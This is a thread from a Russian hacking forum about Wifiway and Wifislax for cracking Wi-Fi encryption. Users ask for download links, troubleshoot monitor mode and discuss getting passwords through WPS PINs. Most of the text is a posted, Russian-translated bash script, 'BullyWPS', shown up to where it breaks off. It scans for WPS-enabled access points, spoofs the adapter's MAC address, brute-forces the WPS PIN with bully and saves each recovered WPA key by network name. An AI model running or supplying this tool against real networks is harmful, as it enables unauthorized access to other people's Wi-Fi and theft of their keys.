Wifiway софт для взлома wep wpa wpa2

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by теща, 23 Sep 2011.

  1. pangyndo

    pangyndo New Member

    Joined:
    13 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Можно ссылку где взять???
     
    1. Vovan71

      Vovan71 Member

      Joined:
      18 May 2015
      Messages:
      71
      Likes Received:
      28
      Reputations:
      0
      Какая то странная фигня.
      Wifislax стоит на HDD.
      Inflator и FreedingBootle сошли с ума.
      Обе не хотят работать - при переводе карты в Monitor Mode, возвращает сообщение.
      Can not into monitor mode!
      и все тут.
      Причем карта в реальности отрубается от инета.

      Все остальные проги и скрипты без исключения работают отлично.
      На трех разных адаптерах такое поведение.

      Где у них там настройки глянуть? Чего не хватает им для счастья? Переставлять то не хоца :-/

      P.S. Загрузился с флешки - все работает. Как бы вылечить на HDD?
       
      1. vovan54

        vovan54 New Member

        Joined:
        18 Dec 2008
        Messages:
        10
        Likes Received:
        0
        Reputations:
        0
        Имею планшет Samsung KE500 T1C адаптер Broadcom 802.11abgn Wireless SDIO Adapter чипсет BCM4330 см.http://www.wireless-driver.com/broadcom-bcm4330-wireless-win7-win8-driver-utility/ . Подскажите каким софтом лучше пользоваться для wardrivinga.
        Спасибо.
         
        1. in062

          in062 Member

          Joined:
          23 Jun 2015
          Messages:
          69
          Likes Received:
          13
          Reputations:
          0
          Используй kali 2.0 или backtrack 5 R3 залей на загрузочную флешку и радуйся aircrack-ng там уже есть
           
          1. Andrey9999

            Andrey9999 Elder - Старейшина

            Joined:
            23 May 2012
            Messages:
            3,187
            Likes Received:
            31,486
            Reputations:
            72
            ну там, где Clave WPA...: - пароли от точек
            Что не так?
             
            1. Andrey9999

              Andrey9999 Elder - Старейшина

              Joined:
              23 May 2012
              Messages:
              3,187
              Likes Received:
              31,486
              Reputations:
              72
              Нет, имя - "MY_WI-FI", "ficks2008", но кстати зная pin - можно подключиться к точке даже без пароля)...
               
              power84 likes this.
              1. Andrey9999

                Andrey9999 Elder - Старейшина

                Joined:
                23 May 2012
                Messages:
                3,187
                Likes Received:
                31,486
                Reputations:
                72
                http://airslax.net/forum/4-103-1
                Хотя у тебя и пароли есть
                 
                power84 likes this.
                1. binarymaster

                  binarymaster Elder - Старейшина

                  Joined:
                  11 Dec 2010
                  Messages:
                  4,717
                  Likes Received:
                  10,195
                  Reputations:
                  126
                  На самом деле, это просто так звучит.

                  Взять, например, всем известный WPS клиент JSW/QSS. Он работает по следующему алгоритму:
                  1. Поиск сетей с WPS
                  2. Использование пин кода на выбранной точке для получения пароля
                  3. Добавление нового профиля беспроводной сети в систему (имя сети / шифрование / пароль)

                  Таким образом, так или иначе, подключение к сети осуществляется по паролю. Другой вопрос, что этот алгоритм незаметен для простого пользователя.
                   
                  pta53-68bis likes this.
                  1. kaliastr2009

                    kaliastr2009 New Member

                    Joined:
                    19 Oct 2015
                    Messages:
                    28
                    Likes Received:
                    2
                    Reputations:
                    0

                    ссылки битые не могли бы перезалит?
                     
                    1. 5maks5

                      5maks5 Elder - Старейшина

                      Joined:
                      29 Aug 2010
                      Messages:
                      452
                      Likes Received:
                      265
                      Reputations:
                      40
                      Code:
                      #!/bin/bash 
                      
                      
                      # Global Variables
                      SCRIPT="BullyWPS"
                      VERSION="2.1"
                      KEYS="$HOME/$SCRIPT/KEYS"
                      TMP="/tmp/$SCRIPT"
                      WPSPIN="pinWPS" 
                      
                      
                      # Check if the interface is connected to internet
                      CheckETH() {
                      clear
                      if [ "$(ip route|grep default)" != "" ]; then
                        ETH=$(ip route|awk '/default/ {print $5}')
                        HW_WIFI=$(ifconfig $WIFI|awk '/HW/ {print $5}'|cut -d- -f1,2,3,4,5,6)
                        HW_ETH=$(ifconfig $ETH|awk '/HW/ {print $5}'|tr ':' '-')
                        if [ "$HW_ETH" = "$HW_WIFI" ];then
                          echo
                          echo "[0;31mЧтобы избежать ошибок на интерфейсе \"$ETH\" убедитесь, что отключены от интернета! [0m"
                          echo ""
                          echo "Нажмите enter для возврата в меню."
                          read junk
                          menu
                        fi
                      fi
                      }
                      
                      # Function to select the target to attack
                      SeleccionarObjetivo() {
                      i=0
                      redesWPS=0
                      while read BSSID Channel RSSI WPSVersion WPSLocked ESSID;do
                        longueur=${#BSSID}
                        if [ $longueur -eq 17 ] ; then
                          i=$(($i+1))
                          WPSbssid[$i]=$BSSID
                          WPSchanel[$i]=$Channel
                          WPSessid[$i]=$ESSID
                          PWR[$i]=$RSSI
                        fi
                        redesWPS=$i
                      done < $TMP/wash_capture.$$
                      if  [ "$redesWPS" = "0" ];then
                        clear
                        echo ""
                        echo ""
                        echo "                        * * *     В Н И М А Н И Е   * * *                "
                        echo ""
                        echo "                          Not found any RED "
                        echo "                          Включен захват WPS"
                        echo ""
                        echo "                          [1;33mНажмите ENTER для возврата в меню!"
                        read junk
                        menu
                      else
                        clear
                        echo ""
                        echo "                [1;32mТочки доступа уязвимые для атаки с BullyWPS[0m"
                        echo ""
                        echo "            MAC            SUPPORTED?      PWR      Канал        ESSID"
                        echo ""
                        countWPS=0
                        while [ 1 -le $i ]; do
                          countWPS=$(($countWPS+1))
                          ESSID=${WPSessid[$countWPS]}
                          BSSID=${WPSbssid[$countWPS]}
                          PWR=${PWR[$countWPS]}
                          Chanel=${WPSchanel[$countWPS]}
                          echo " $countWPS)  $BSSID         $SOPORTADA          $PWR         $Chanel         $ESSID"
                          i=$(($i-1))
                        done  
                        i=$redesWPS
                        echo ""
                        echo " 0)  Возврат в меню " 
                        echo ""
                        echo ""
                        echo " --> [1;36mSelect a network[0m"
                        read WPSoption
                        set -- ${WPSoption}
                      
                        if [ $WPSoption -le $redesWPS ]; then
                          if [ "$WPSoption" = "0" ];then
                            menu
                          fi
                          ESSID=${WPSessid[$WPSoption]}
                          BSSID=${WPSbssid[$WPSoption]}
                          CHANEL=${WPSchanel[$WPSoption]}
                          clear
                        else
                          echo " Выбор не верен ... выберите заново"
                          sleep 2
                          SeleccionarObjetivo
                        fi
                      fi
                      ShowWPA="OFF"
                      InfoAP="ON"
                      menu
                      }
                      
                      # Ищем WPS сети с помощью Wash
                      WashScan() {
                      if [ "$WIFI" = "" ]; then auto_select_monitor && WashScan; fi
                      CheckETH
                      xterm -icon -e wash -i $WIFI -C -o $TMP/wash_capture.$$ & 
                      WashPID=$!
                      sec_rem=30 
                      sleep 30 && kill $WashPID &>/dev/null &
                      while true; do
                      let sec_rem=$sec_rem-1
                              interval=$sec_rem
                              seconds=`expr $interval % 60`
                              interval=`expr $interval - $seconds`
                        sleep 1
                        clear
                        echo "[1;33mИщем цели... [1;36m$seconds[0m [1;33mseconds[0m"
                        echo ""
                        cat $TMP/wash_capture.$$
                        if [ ! -e /proc/$WashPID ]; then
                          sleep 1
                          break
                        fi
                      done
                      SeleccionarObjetivo
                      }
                      
                      auto_select_monitor() {
                      #! /bin/bash
                      
                      #Переводим карту в режим monitor mode автоматически
                      
                      clear
                      t=0
                      if [ "$WIFI" = "" ]; then
                      > $TEMP/wireless.txt
                      cards=`airmon-ng|cut -d ' ' -f 1 | awk {'print $1'} |grep -v Interface #|grep -v  mon   `
                      echo $cards >> $TEMP/wireless.txt
                      tarj1=`cat $TEMP/wireless.txt | cut -d  ' ' -f 1  | awk  '{print $1}'`
                      tarj2=`cat $TEMP/wireless.txt | cut -d  ' ' -f 2  | awk  '{print $1}'`
                      rm  -rf $TEMP/wireless.txt
                      
                      if  [ "$tarj1" = "" ]; then
                      clear
                      echo "                  * * *     В Н И М А Н И Е   * * *                "
                      echo ""
                      echo "    Не найденно ни одной WiFi карточки на этом компьютере"
                      echo ""
                      echo "    Нажмите ENTER для возврата в меню"
                      read yn
                      menu
                      fi
                      
                      if [ "$tarj1" = "$tarj2" ]; then
                      tarj2=""
                      fi
                      
                      tarjselec=$tarj1
                      
                      if [ "$tarj2" != "" ] ;then
                      echo
                      echo
                      echo "      Следующие WiFi карты найденны на компьютере"
                      echo
                      
                      airmon-ng |awk 'BEGIN { print "Карта  Чип              Драйвер\n------- ------------------ ----------" } \
                        { printf "%-8s %-8s %-1s %10s\n", $1, $2, $3, $4 | "sort -r"}' |grep -v Interface  |grep -v Chipset
                      
                      echo "      Выберите одну из карт"
                      echo
                      
                      tarj_wire=""
                      tarjselec=""
                      function selectarj {
                      select tarjselec in `airmon-ng | awk {'print $1 | "sort -r"'} |grep -v Interface |grep -v Chipset  `; do
                      break;
                      done
                      
                      if [ "$tarjselec" = "" ]; then
                      echo "  Выбранные опции неверны."
                      echo "  Выберите верные опции..."
                      selectarj
                      fi
                      }
                      
                      if [ "$tarjselec" = "" ]; then
                      selectarj
                      fi
                      
                      echo ""
                      echo "Выбранный интерфейс: $tarjselec"
                      
                      fi
                      else
                      echo 
                      fi
                      tarjmonitor=${tarjselec:0:3}
                      if [ "$tarjmonitor" != "mon" ] && [ "$WIFI" = "" ];then
                      echo ""
                      echo ""
                      echo "                    Переводим карту в режим monitor mode..."
                      echo "" 
                      sleep 1
                      
                      #clean interface
                      
                      ifconfig $tarjselec down >/dev/null
                      ifconfig $tarjselec up >/dev/null
                              ifconfig $tarjselec down
                              ifconfig $tarjselec hw ether 00:11:22:33:44:55
                              ifconfig $tarjselec up
                      
                      airmon-ng start $tarjselec >/dev/null
                      cards=`airmon-ng|cut -d ' ' -f 1 |awk {'print $1 | "sort -d"'} |grep -v Interface |grep -v wlan`
                      largo=${#cards}
                      final=$(($largo-4))
                      WIFI=${cards:final}
                      echo  " $WIFI ----> Monitor mode включен."
                      sleep 2
                      
                      else 
                      if [ "$WIFI" = "" ];then
                      WIFI="$tarjselec"
                      
                      echo "" 
                      echo  " $WIFI ----> Monitor mode уже включен."
                      sleep 2
                      fi
                      fi
                      clear
                      
                      # Spoof Mac Address and put card into monitor mode
                      echo -e "Хотите сменить MAC адрес вашей WiFi карты? y/n"
                      
                      read b
                      if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
                              wmac=00:11:22:33:44:55
                              echo
                              ifconfig $WIFI down
                              macchanger -m 00:11:22:33:44:55 $WIFI
                              ifconfig $WIFI up
                              echo
                              echo
                              sleep 3
                              else
                      echo "    Нажмите enter для продолжения."
                      read c
                      if [[ $c == "N" || $c == "n" || $c = "" ]]; then
                              ifconfig $tarjselec down
                              macchanger -p $tarjselec
                              ifconfig $tarjselec up
                              tput setaf 1; echo "продолжить без смены MAC"
                              echo
                              echo
                              echo
                              sleep 2
                      fi
                      fi
                      }  
                      
                      function ObtenerWPA_con_pin_o_no {
                      read -p "Ввести PIN вручную? Y/n :" x y
                      
                      if [[ $x == "Y" || $x == "y" || $x = "" ]]; then
                       read -p "pinWPS: " XWPSPIN
                       echo ""
                       echo ""
                       echo ""
                      xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $XWPSPIN -F -B -l 100 -v 3 &
                       bullyPID=$!
                      # If "Control + C" is pressed, the process stops Bully
                      trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
                      while true; do
                        sleep 1
                        clear
                      echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
                        echo "[1;33mПолучаем WPA...[0m"
                        echo ""
                        if [ ! -e /proc/$bullyPID ]; then
                          sleep 2
                          break
                        fi
                      done
                      echo ""
                      if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
                                   PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
                      CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
                      if [ "$WPA_KEY" = "" ]; then
                        WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
                        echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
                        echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
                        echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
                        cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
                        ShowWPA="ON"
                        echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
                      fi
                      fi
                      clear
                      echo "" 
                      echo "" 
                      echo "" 
                      wait
                      else
                      echo "    Нажмите enter для продолжения."
                      if [[ $y == "N" || $y == "n" || $y = "" ]]; then
                      read y
                      # Attack the Access point
                      
                      xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -F -l 100 -v 3 &
                      bullyPID=$!
                      # If "Control + C" is pressed, the process stops bully
                      trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
                      while true; do
                        sleep 1
                        clear
                      echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
                        echo "[1;33mПолучаем WPA...[0m"
                        echo ""
                        if [ ! -e /proc/$bullyPID ]; then
                          sleep 2
                          break
                        fi
                      done
                      echo ""
                      if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
                                   PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
                      CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
                      if [ "$WPA_KEY" = "" ]; then
                        WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
                        echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
                        echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
                        echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
                        cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
                        ShowWPA="ON"
                        echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
                      echo "" 
                      sleep 3
                      echo ""
                      echo "    Нажмите enter для продолжения."
                      read junk
                      menu
                      fi
                      fi
                      fi
                      fi
                      }
                      
                      function ObtenerWPA {
                      read -p "Ввести PIN вручную? Y/n :" y
                      
                      if [[ $y == "Y" || $y == "y" || $y = "" ]]; then
                      read -p "pinWPS: " yWPSPIN
                       echo ""
                       echo ""
                       echo ""
                      xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $yWPSPIN -F -B -v 3 &
                      bullyPID=$!
                      # If "Control + C" is pressed, the process stops bully
                      trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
                      while true; do
                        sleep 1
                        clear
                      echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
                        echo "[1;33mПолучаем WPA...[0m"
                        echo ""
                        if [ ! -e /proc/$bullyPID ]; then
                          sleep 2
                          break
                        fi
                      done
                      echo ""
                      if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
                                   PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
                      CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
                      if [ "$WPA_KEY" = "" ]; then
                        WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
                        echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
                        echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
                        echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
                        cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
                        ShowWPA="ON"
                        echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
                      fi
                      fi
                      clear
                      echo "" 
                      echo "" 
                      echo "" 
                      wait
                      else
                      echo "    Нажмите Enter для продолжения."
                      if [[ $e == "N" || $e == "n" || $e = "" ]]; then
                      read e
                      # Attack the Access point
                      
                      xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID --force -B -v 3 &
                       bullyPID=$!
                      # If "Control + C" is pressed, the process stops bully
                      trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
                      while true; do
                        sleep 1
                        clear
                      echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
                        echo "[1;33mПолучаем WPA...[0m"
                        echo ""
                        if [ ! -e /proc/$bullyPID ]; then
                          sleep 2
                          break
                        fi
                      done
                      echo ""
                      if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
                                   PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
                      CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
                      if [ "$WPA_KEY" = "" ]; then
                        WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
                        echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
                        echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
                        echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
                        cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
                        ShowWPA="ON"
                        echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
                      sleep 3
                      echo ""
                      echo "Нажмите enter для возврата в меню"
                      read junk
                      menu
                      fi
                      fi
                      fi
                      fi
                      }
                      
                      function Primer_pin {
                      read -p "YВвести PIN вручную? Y/n :" d
                      
                      if [[ $d == "Y" || $d == "y" || $d = "" ]]; then
                      read -p "pinWPS: " dWPSPIN
                       echo ""
                       echo ""
                       echo ""
                      CheckETH
                      xterm -hold -geometry 65x30-1-1 -e bully  $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $dWPSPIN -F -B -v 3  & 
                      bullyPID=$!
                      # If "Control + C" is pressed, the process stops bully
                      trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
                      while true; do
                        sleep 1
                        clear
                      echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
                        echo "[1;33mПолучаем WPA...[0m"
                        echo ""
                        if [ ! -e /proc/$bullyPID ]; then
                          sleep 2
                          break
                        fi
                      done
                      echo ""
                      if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
                                   PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
                      CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
                      if [ "$WPA_KEY" = "" ]; then
                        WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
                        echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
                        echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
                        echo "Ключ WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
                        cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
                        ShowWPA="ON"
                        echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
                      sleep 3
                      echo ""
                      echo "    Нажмите enter для продолжения."
                      read junk
                      menu
                      fi
                      fi
                      fi
                      }
                      
                      #Functional Bully Commands
                      function optional_functions {
                      #Set optional functions
                      bully #to show the options available in terminal
                      echo "[+] bully $WIFI -b $BSSID -c $CHANEL -e $ESSID"
                      echo "[+] Enter other functions bully to attack with ex-A-C-D, etc. with spaces"
                      read bullyVars
                      #Start
                      xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID $bullyVars & 
                      bullyPID=$!
                      # If "Control + C" is pressed, the process stops bully
                      trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
                      while true; do
                        sleep 1
                        clear
                      echo "[+] Starting bully (bully $WIFI -b $BSSID -c $CHANEL -e $ESSID $bullyVars)"
                      echo "[+] Attacking " $BSSID---$ESSID "on channel " $CHANEL " Good Luck and Happy Hacking"
                        echo "[1;33mПолучаем WPA...[0m"
                        echo ""
                        if [ ! -e /proc/$bullyPID ]; then
                          sleep 2
                          break
                        fi
                      done
                      echo ""
                      if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
                                   PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
                      CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
                      if [ "$WPA_KEY" = "" ]; then
                        WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
                        echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
                        echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
                        echo "Key WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
                        cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
                        ShowWPA="ON"
                        echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
                      sleep 3
                      echo ""
                      echo ""
                      echo "Нажмите enter для возврата в меню."
                      read junk
                      menu
                      fi
                      fi
                      }
                      
                      #Function update Bully
                      function bully_update {
                      echo "   "
                      echo "          [1;32mЭто автоматический установщик обновлений для bully[0m"
                      echo ""
                      echo "        [1;36m[Необходим интернет для скачивания пакетов bully][0m"
                      echo ""
                      sleep 1
                      echo "Процедура скачивания последней версии."
                      sleep 3
                      
                      # Download the latest Revision with svn
                      cd /tmp
                      echo "[1;32m"
                      svn co http://bully.googlecode.com/svn/trunk/src/ /tmp/bully-read-only && \
                      echo [0m
                      cd /tmp/bully-read-only
                      clear
                      sleep 2
                      
                      # Version identification
                      if [ ! -d ".svn/" ]
                      then
                          echo "0"
                          exit ;
                      fi
                      
                      REVISION="`svnversion 2> /dev/null | sed 's/[^0-9]*//g'`"
                      
                      if [ x$REVISION = "x" ]
                      then
                          REVISION="`svn info 2> /dev/null | grep -i revision | sed
                      's/[^0-9]*//g'`"
                      fi
                      
                      if [ x$REVISION = "x" ]
                      then
                          if [ -f ".svn/entries" ]
                          then
                              REVISION="`cat .svn/entries | grep -i revision | head -n 1 | sed
                      's/[^0-9]*//g'`"
                          fi
                      fi
                      
                      if [ x$REVISION = "x" ]
                      then
                          REVISION="-1"
                      fi
                      
                      # We report the version
                      echo ""
                      echo ""
                      echo "                      [1;33m<<[0m Версия пакета-[1;32m$REVISION
                      [1;33m>>[0m"
                      sleep 3
                      
                      # Compile
                      echo ""
                      echo ""
                      echo "[1;33mSe Процедура комплирования пакетов ..."
                      sleep 3
                      echo "[1;36m"
                      make  && \
                      echo "[0m"
                      clear
                      sleep 3
                      
                      # Installed in system
                      echo ""
                      echo ""
                      echo "[1;35mПроцедура установки пакетов в систему..."
                      sleep 3
                      echo ""
                      echo "[1;33m"
                      make install && \
                      echo "[0m"
                      clear
                      sleep 3
                      
                      
                      # Limpiamos
                      echo ""
                      echo ""
                      echo "[1;36mЧищу временные файлы.."
                      echo ""
                      sleep 3
                      rm -Rf /tmp/bully-read-only/trunk/src/ &> /dev/null
                      rm -Rf $DESTDIR &> /dev/null
                      sleep 2
                      
                      # We report the completion of the process
                      echo ""
                      echo ""
                      echo "[1;33mВсе задачи были выполненны! "
                      echo ""
                      echo ""
                      sleep 3
                      wait
                      
                      # Press ENTER to return to menu
                      
                      echo ""
                      echo "Нажмите enter для возврата в меню."
                      read yn
                      menu
                      }
                      #Function update macchanger
                      function macchanger_update {
                      echo "   "
                      echo "          [1;32mЭто автоматический установщик обновлений для macchanger[0m"
                      echo ""
                      echo "        [1;36m[Необходим интернет для скачивания пакетов macchanger][0m"
                      echo ""
                      sleep 1
                      echo "Процедура скачивания последней версии. "
                      sleep 3
                      
                      # Download the latest Revision with svn
                      cd /tmp
                      echo "[1;32m"
                      git clone http://github.com/alobbs/macchanger/ /tmp/macchanger && \
                      echo [0m
                      cd /tmp/macchanger
                      clear
                      sleep 2
                      # Cmpile
                      echo ""
                      echo ""
                      echo "[1;33mSe Процедура комплирования пакетов ..."
                      sleep 3
                      echo "[1;36m"
                      bash autogen.sh
                      echo "[0m"
                      sleep 3
                      make  && \
                      echo "[0m"
                      clear
                      sleep 3
                      
                      # Installed in system
                      echo ""
                      echo ""
                      echo "[1;35mПроцедура установки пакетов в систему..."
                      sleep 3
                      echo ""
                      echo "[1;33m"
                      make install && \
                      echo "[0m"
                      clear
                      sleep 3
                      
                      
                      # Clean
                      echo ""
                      echo ""
                      echo "[1;36mЧищу временные файлы.."
                      echo ""
                      sleep 3
                      rm -Rf /tmp/macchanger/ &> /dev/null
                      sleep 2
                      
                      # We report the completion of the process
                      echo ""
                      echo ""
                      echo "[1;33mВсе процессы были выполненны! "
                      echo ""
                      echo ""
                      sleep 3
                      wait
                      
                      # Press ENTER to return to menu
                      
                      echo ""
                          echo "Нажмите enter для возврата в меню."
                      read yn
                      menu
                      }
                      
                      #Function card unmount and exit
                      function DESMONTAR_tarj_y_salir {
                      if [ "$WIFI" != "" ]; then
                      clear
                      echo ""
                        echo ""
                        echo ""
                        echo "    [1;33m####################################################################"
                        echo "    [1;33m###                                                              ###"
                        echo "    [1;33m###     ¿ Извлечь карту после выхода?                            ###"
                        echo "    [1;33m###                                                              ###"
                        echo "    [1;33m###        (n) Нет  -> Выйти без извлечения                      ###"
                        echo "    [1;33m###        (m) Меню -> Обратно в главное меню                    ###"
                        echo "    [1;33m###        ENTER    -> Извлечь и выйти                           ###"
                        echo "    [1;33m###       (r)+ENTER -> Восстановит оригинальный MAC              ###"
                        echo "    [1;33m###                                                              ###"
                        echo "    [1;33m####################################################################"
                        echo ""
                        echo ""
                      read salida
                      set -- ${salida}
                      
                      if [ "$salida" = "r" ]; then
                      ifconfig $tarjselec down
                      macchanger -p $tarjselec
                      ifconfig $tarjselec up
                      fi
                      if [ "$salida" = "m" ]; then
                      menu
                      fi
                      if [ "$salida" = "n" ]; then
                        echo ""
                      echo "         Ждите."
                      sleep 2
                      clear 
                      exit
                      fi
                      echo "$WIFI карта была успешно извлечена!"
                      airmon-ng stop $WIFI >/dev/null
                      fi
                        echo ""
                      echo "         Ждите."
                      sleep 2
                      clear
                       exit
                      
                      }
                      
                      menu() {
                      # Welcome
                      echo " #########################################################################################"
                      echo " #                                                                                       #"
                      echo " #    ~ Скрипт автоматической атаки на WPS с помощью Bully написан @cristi_28            #"
                      echo " #    ~ Перевод на русский: 5maks5 [ forum.antichat.ru/member.php?u=136564 ]             #"
                      echo " #    ~ Раздел беспроводные технологии: [ forum.antichat.ru/forum113.html ]              #"
                      echo " #    ~ Сайт автора: [ http://lampiweb.com ]; Поддержка: Kali,WifiSlax                   #"
                      echo " #    ~ Версия: 2.1 (перевод 19.07.14) зависимости: BullyWPS $VERSION                         #"
                      echo " #                                                                                       #"
                      echo " #                                                                                       #"
                      echo " #########################################################################################"
                      sleep 1
                      echo "---------------------------------------"
                      if [ "$InfoAP" = "ON" ]; then
                        echo "Информация:"
                        echo ""
                        echo "              ESSID = $ESSID"
                        echo "              Канал = $CHANEL"
                        echo "         MAC AP = $BSSID"
                        fi
                        if [ "$ShowWPA" = "ON" ]; then
                        echo "          WPA Key = $WPA_KEY"
                        fi
                        echo "---------------------------------------"
                      echo ""
                      echo " 1) Поиск точек с включенным WPS"
                      echo ""
                      echo " 2) Выбрать другую жертву"
                      echo ""
                      echo " 3) Подбор WPA с Bully"
                      echo ""
                      echo " 4) Подбор WPA без проверки калькулятора " 
                      echo ""
                      echo " 5) Добавить комманды Bully ( пр: -N -Z , итд. ) "
                      echo ""
                      echo " 6) Добавить первые 4 цифры + xxxx"
                      echo ""
                      echo " 7) Обновить Bully"
                      echo ""
                      echo " 8) Обновить MACChanger"
                      echo ""
                      echo " 0) Выход"
                      echo ""
                      read -p " #> " CHOISE
                      echo ""
                      case $CHOISE in
                        1 ) WashScan;;
                        2 ) SeleccionarObjetivo;;
                        3 ) ObtenerWPA_con_pin_o_no;;
                        4 ) ObtenerWPA;;
                        5 ) optional_functions;;
                        6 ) Primer_pin;;
                        7 ) bully_update;;
                        8 ) macchanger_update;;
                        0 ) DESMONTAR_tarj_y_salir;;
                        * ) echo "Неверно выбранный пункт!"; menu;;
                      esac
                      }
                      
                      # User check
                      if [ "$(whoami)" != "root" ]; then
                       echo -e '\e[1;31m
                      
                      
                          ¡¡¡ Запуск возможен только от root !!!
                      
                              Проверка: sudo $0
                      
                      \e[0m' 
                      
                       exit 1
                      fi
                      
                      # Create directories if they do not exist 
